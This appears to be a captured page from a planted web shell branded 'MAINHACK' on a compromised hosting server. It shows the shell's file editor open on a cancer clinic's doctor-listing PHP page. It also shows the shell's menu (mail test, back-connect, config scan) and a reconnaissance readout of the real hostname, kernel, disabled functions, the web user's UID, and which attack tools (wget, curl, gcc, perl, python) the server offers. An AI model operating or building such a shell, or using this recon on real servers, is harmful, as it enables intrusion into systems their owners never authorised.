[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: our-doctors.php
<?php include("header.php"); ?> <!-- // header --> <!-- Banner Start --> <div class="all-banner"> <img src="images/banner2.jpg" alt="" style="width:100%; height:auto;" /> <div class="desc"> <div class="container"> </div> </div> </div> <!-- // Banner --> <!-- Appointments --> <div class="appointments"> <div class="container"> <div class="spec aos-init aos-animate" data-aos="fade-down" style="transition:all 1500ms ease-in-out"> <h2>Know our cancer specialists</h2> </div> <div class="row"> <?php $count=1; $sq="select * from doctor order by id desc"; $r=mysqli_query($con,$sq); while($row=mysqli_fetch_array($r)){ $doc=$row['doctor_id']; $name=$row['name']; $cate=$row['category']; $img=$row['image']; ?> <div class="col-md-2 col-sm-2 col-sx-12" style="padding:0 5px;"> <div class="appointments-box"> <img src="doctor_corner/doctor_img/<?=$img?>" alt="Notebook" style="width:100%;"> <div class="overlay"> <div class="text"> <a href="dr-profile.php?id=<?=base64_encode($doc)?>">Profile View</a> <input type="hidden" value="<?=base64_encode($doc)?>" id="id<?=$count;?>"> <script> $(document).ready(function(){ // Add more $('#check<?=$count;?>').click(function(){ var user_id="<?php echo $_SESSION['user_id']; ?>"; var x =$("#id<?=$count;?>").val(); if(user_id==""){ alert('Please Login to generate enquiry'); window.location.href='login.php?url=<?=base64_encode($_SERVER[REQUEST_URI])?>'; return false; }else{ window.location.href='enquiry.php?id=<?=base64_encode($doc)?>'; return true; } }); }); </script> <a href="#" id="check<?=$count;?>">Enquiry</a> </div> </div> <div class="content"> <h3><?=$name;?></span></h3> <p><?=$cate;?></p> </div> </div> </div> <?php ++$count;} ?> </div> </div> </div> <!-- // Appointments --> <!-- footer --> <?php include("footer.php"); ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 677.6 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619